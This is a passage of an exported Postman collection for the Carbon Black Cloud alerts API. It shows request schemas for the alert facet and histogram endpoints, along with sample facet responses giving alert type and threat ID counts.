\"replica_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"connection_type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"egress_group_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"egress_group_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ip_reputation\": [\n      &lt;integer&gt;\n    ],\n    \"remote_is_private\": &lt;boolean&gt;,\n    \"remote_namespace\": [\n      \"&lt;string&gt;\"\n    ],\n    \"remote_replica_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"remote_workload_kind\": [\n      \"&lt;string&gt;\"\n    ],\n    \"remote_workload_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"tms_rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"threat_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"vendor_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"vendor_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"product_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"product_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"external_device_friendly_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"serial_number\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ml_classification_final_verdict\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ml_classification_global_prevalence\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ml_classification_org_prevalence\": [\n      \"&lt;string&gt;\"\n    ],\n    \"mdr_alert\": \"&lt;boolean&gt;\",\n    \"mdr_workflow_status\": [\n      \"&lt;string&gt;\"\n    ],\n    \"mdr_workflow_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"mdr_workflow_is_assigned\": \"&lt;boolean&gt;\",\n    \"mdr_determination_value\": [\n      \"&lt;string&gt;\"\n    ],\n    \"mdr_determination_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"mdr_alert_notes_present\": \"&lt;boolean&gt;\",\n    \"mdr_threat_notes_present\": \"&lt;boolean&gt;\"\n  },\n  \"exclusions\": {\n    \"org_key\": [\n      \"&lt;string&gt;\"\n    ],\n    \"id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"backend_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"user_update_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"backend_update_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"detection_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"first_event_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"last_event_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"category\": [\n      \"&lt;string&gt;\"\n    ],\n    \"minimum_severity\": \"&lt;integer&gt;\",\n    \"reason_code\": [\n      \"&lt;string&gt;\"\n    ],\n    \"threat_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"primary_event_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"policy_applied\": [\n      \"&lt;string&gt;\"\n    ],\n    \"run_state\": [\n      \"&lt;string&gt;\"\n    ],\n    \"sensor_action\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_status\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"workflow_changed_by_type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_changed_by_autoclose_rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_closure_reason\": [\n      \"&lt;string&gt;\"\n    ],\n    \"determination_value\": [\n      \"&lt;string&gt;\"\n    ],\n    \"determination_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"determination_changed_by_type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"tags\": [\n      \"&lt;string&gt;\"\n    ],\n    \"alert_notes_present\": \"&lt;boolean&gt;\",\n    \"threat_notes_present\": \"&lt;boolean&gt;\",\n    \"device_id\": [\n      \"&lt;long&gt;\"\n    ],\n    \"device_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_uem_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_policy\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_policy_id\": [\n      \"&lt;long&gt;\"\n    ],\n    \"device_target_value\": [\n      \"&lt;string&gt;\"\"&lt;string&gt;\"\n    ],\n    \"device_os\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_os_version\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_location\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_external_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_internal_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_config_type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_config_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_config_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_category_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_guid\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_pid\": [\n      \"&lt;integer&gt;\"\n    ],\n    \"process_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_cmdline\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_signatures_certificate_authority\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_signatures_publisher\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_guid\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_pid\": [\n      \"&lt;integer&gt;\"\n    ],\n    \"parent_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_cmdline\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_guid\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_cmdline\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_port\": [\n      \"&lt;integer&gt;\"\n    ],\n    \"netconn_local_port\": [\n      \"&lt;integer&gt;\"\n    ],\n    \"netconn_protocol\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_domain\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_local_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_ipv4\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_local_ipv4\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_ipv6\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_local_ipv6\": [\n      \"&lt;string&gt;\"\n    ],\n    \"threat_category\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ttps\": [\n      \"&lt;string&gt;\"\n    ],\n    \"attack_tactic\": [\n      \"&lt;string&gt;\"\n    ],\n    \"attack_technique\": [\n      \"&lt;string&gt;\"\n    ],\n    \"report_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"report_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"report_link\": [\n      \"&lt;string&gt;\"\n    ],\n    \"watchlists_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"watchlists_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_policy_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_policy\": [\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_rule\": [\n      \"&lt;string&gt;\"\n    ],\n    \"cluster_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"namespace\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workload_kind\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workload_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"replica_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"connection_type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"egress_group_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"egress_group_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ip_reputation\": [\n      &lt;integer&gt;\n    ],\n    \"remote_is_private\": &lt;boolean&gt;,\n    \"remote_namespace\": [\n      \"&lt;string&gt;\"\n    ],\n    \"remote_replica_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"remote_workload_kind\": [\n      \"&lt;string&gt;\"\n    ],\n    \"remote_workload_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"tms_rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"threat_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"vendor_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"vendor_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"product_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"product_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"external_device_friendly_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"serial_number\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ml_classification_final_verdict\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ml_classification_global_prevalence\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ml_classification_org_prevalence\": [\n      \"&lt;string&gt;\"\n    ],\n    \"mdr_alert\": &lt;boolean&gt;,\n    \"mdr_workflow_status\": [\n      \"&lt;string&gt;\"\n    ],\n    \"mdr_workflow_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"mdr_workflow_is_assigned\": \"&lt;boolean&gt;\",\n    \"mdr_determination_value\": [\n      \"&lt;string&gt;\"\n    ],\n    \"mdr_determination_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"mdr_alert_notes_present\": \"&lt;boolean&gt;\",\n    \"mdr_threat_notes_present\": \"&lt;boolean&gt;\"\n  },\n  \"filter_values\": \"&lt;boolean&gt;\"\n}\n\n</code></pre>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","alerts","v7","orgs","{{cb_org_key}}","alerts","_facet"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"01559712-6c61-4548-a788-b15827f96166","name":"Facet alerts - ungrouped","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"terms\": {\n        \"fields\": [\n            \"type\",\n            \"THREAT_ID\"\n        ],\n        \"rows\": 3\n    },\n    \"criteria\": {\n        \"minimum_severity\": \"3\"\n    },\n    \"exclusions\": {\n        \"type\": [\n            \"HOST_BASED_FIREWALL\",\n            \"CONTAINER_RUNTIME\"\n        ]\n    },\n    \"filter_values\": true\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/api/alerts/v7/orgs/{{cb_org_key}}/alerts/_facet"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 17 Apr 2023 19:38:40 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"240"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Content-Encoding","value":"br"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Set-Cookie","value":"JSESSIONID=6B743E548B6E4C9DCC9758DB8AC88FB5; Path=/api/alerts; Secure; HttpOnly"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"results\": [\n        {\n            \"field\": \"threat_id\",\n            \"values\": [\n                {\n                    \"total\": 1600,\n                    \"id\": \"0569620088E6669121E38D9A64DBC24E\",\n                    \"name\": \"0569620088E6669121E38D9A64DBC24E\"\n                },\n                {\n                    \"total\": 52,\n                    \"id\": \"19261158DBBF00775959F8AA7F7551A1\",\n                    \"name\": \"19261158DBBF00775959F8AA7F7551A1\"\n                },\n                {\n                    \"total\": 47,\n                    \"id\": \"d6ea0f3012e949cf08d4fbc813892170\",\n                    \"name\": \"d6ea0f3012e949cf08d4fbc813892170\"\n                }\n            ]\n        },\n        {\n            \"field\": \"type\",\n            \"values\": [\n                {\n                    \"total\": 1679,\n                    \"id\": \"WATCHLIST\",\n                    \"name\": \"WATCHLIST\"\n                },\n                {\n                    \"total\": 73,\n                    \"id\": \"CB_ANALYTICS\",\n                    \"name\": \"CB_ANALYTICS\"\n                },\n                {\n                    \"total\": 7,\n                    \"id\": \"NETWORK_TRAFFIC_ANALYSIS\",\n                    \"name\": \"NETWORK_TRAFFIC_ANALYSIS\"\n                }\n            ]\n        }\n    ]\n}"},{"id":"481127b4-3d7c-445e-a177-c7294b39358d","name":"Facet alerts - Threat Hunt","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"time_range\": {\n        \"range\": \"-14d\"\n    },\n    \"terms\": {\n        \"fields\": [\n            \"type\",\n            \"threat_hunt_name\"\n        ],\n        \"rows\": 3\n    }\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/api/alerts/v7/orgs/{{cb_org_key}}/alerts/_facet"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 17 Apr 2023 19:38:40 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"240"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Content-Encoding","value":"br"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Set-Cookie","value":"JSESSIONID=6B743E548B6E4C9DCC9758DB8AC88FB5; Path=/api/alerts; Secure; HttpOnly"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"results\": [\n        {\n            \"field\": \"threat_hunt_name\",\n            \"values\": [\n                {\n                    \"total\": 9905,\n                    \"id\": \"demo-threat-hunt-one\",\n                    \"name\": \"demo-threat-hunt-one\"\n                },\n                {\n                    \"total\": 988,\n                    \"id\": \"Threat hunt with MDR Feed\",\n                    \"name\": \"Threat hunt with MDR Feed\"\n                },\n                {\n                    \"total\": 987,\n                    \"id\": \"Threat Hunt Sample Three\",\n                    \"name\": \"Threat Hunt Sample Three\"\n                }\n            ]\n        },\n        {\n            \"field\": \"type\",\n            \"values\": [\n                {\n                    \"total\": 49448,\n                    \"id\": \"WATCHLIST\",\n                    \"name\": \"WATCHLIST\"\n                },\n                {\n                    \"total\": 5117,\n                    \"id\": \"HOST_BASED_FIREWALL\",\n                    \"name\": \"HOST_BASED_FIREWALL\"\n                },\n                {\n                    \"total\": 367,\n                    \"id\": \"CB_ANALYTICS\",\n                    \"name\": \"CB_ANALYTICS\"\n                }\n            ]\n        }\n    ]\n}"}],"_postman_id":"962459c7-14b0-49dc-9fc5-41472be723ea"},{"name":"Get alert histogram","id":"81f643b4-5fc4-4e8e-8990-b96876d6adf8","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n  \"bucket_size\": \"+5DAY\",\n  \"field\": \"LAST_EVENT_TIMESTAMP\",\n  \"min_count\": 0\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/api/alerts/v7/orgs/{{cb_org_key}}/alerts/_histogram","description":"<p>Get statistics about the Alerts. This is designed for use by the widget in the Carbon Black Cloud console.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.alerts</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/alerts-api/#alert-search\">See Documentation</a></p>\n<h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"bucket_size\": \"&lt;string&gt;\",\n  \"query\": \"&lt;string&gt;\",\n  \"time_range\": {\n    \"start\": \"&lt;dateTime&gt;\",\n    \"end\": \"&lt;dateTime&gt;\",\n    \"range\": \"&lt;string&gt;\"\n  },\n  \"criteria\": {\n    \"org_key\": [\n      \"&lt;string&gt;\"\n    ],\n    \"id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"backend_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"user_update_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"backend_update_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"detection_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"first_event_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"last_event_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"category\": [\n      \"&lt;string&gt;\"\n    ],\n    \"minimum_severity\": \"&lt;integer&gt;\",\n    \"reason_code\": [\n      \"&lt;string&gt;\"\n    ],\n    \"threat_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"primary_event_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"policy_applied\": [\n      \"&lt;string&gt;\"\n    ],\n    \"run_state\": [\n      \"&lt;string&gt;\"\n    ],\n    \"sensor_action\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_status\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"workflow_changed_by_type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_changed_by_autoclose_rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_closure_reason\": [\n      \"&lt;string&gt;\"\n    ],\n    \"determination_value\": [\n      \"&lt;string&gt;\"\n    ],\n    \"determination_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"determination_changed_by_type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"tags\": [\n      \"&lt;string&gt;\"\n    ],\n    \"alert_notes_present\": &lt;boolean&gt;,\n    \"threat_notes_present\": &lt;boolean&gt;,\n    \"device_id\": [\n      &lt;long&gt;\n    ],\n    \"device_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_uem_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_policy\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_policy_id\": [\n      &lt;long&gt;\n    ],\n    \"device_target_value\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_os\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_os_version\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_location\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_external_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_internal_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_config_type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_config_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_config_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_category_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_guid\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_pid\": [\n      \"&lt;integer&gt;\"\n    ],\n    \"process_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_cmdline\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_signatures_certificate_authority\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_signatures_publisher\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_guid\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_pid\": [\n      &lt;integer&gt;\n    ],\n    \"parent_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_cmdline\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_guid\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_cmdline\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_port\": [\n      &lt;integer&gt;\n    ],\n    \"netconn_local_port\": [\n      &lt;integer&gt;\n    ],\n    \"netconn_protocol\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_domain\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_local_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_ipv4\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_local_ipv4\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_ipv6\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_local_ipv6\": [\n      \"&lt;string&gt;\"\n    ],\n    \"threat_category\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ttps\": [\n      \"&lt;string&gt;\"\n    ],\n    \"attack_tactic\": [\n      \"&lt;string&gt;\"\n    ],\n    \"attack_technique\": [\n      \"&lt;string&gt;\"\n    ],\n    \"report_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"report_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"report_link\": [\n      \"&lt;string&gt;\"\n    ],\n    \"watchlists_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"watchlists_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_policy_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_policy\": [\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"k8s_rule\": [\n      \"&lt;string&gt;\"\n    ],\n    \"cluster_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"namespace\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workload_kind\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workload_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"replica_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"connection_type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"egress_group_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"egress_group_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ip_reputation\": [\n      &lt;integer&gt;\n    ],\n    \"remote_is_private\": &lt;boolean&gt;,\n    \"remote_namespace\": [\n      \"&lt;string&gt;\"\n    ],\n    \"remote_replica_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"remote_workload_kind\": [\n      \"&lt;string&gt;\"\n    ],\n    \"remote_workload_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"tms_rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"threat_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"vendor_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"vendor_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"product_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"product_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"external_device_friendly_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"serial_number\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"blocked_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ml_classification_final_verdict\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ml_classification_global_prevalence\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ml_classification_org_prevalence\": [\n      \"&lt;string&gt;\"\n    ],\n    \"mdr_alert\": &lt;boolean&gt;,\n    \"mdr_workflow_status\": [\n      \"&lt;string&gt;\"\n    ],\n    \"mdr_workflow_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"mdr_workflow_is_assigned\": &lt;boolean&gt;,\n    \"mdr_determination_value\": [\n      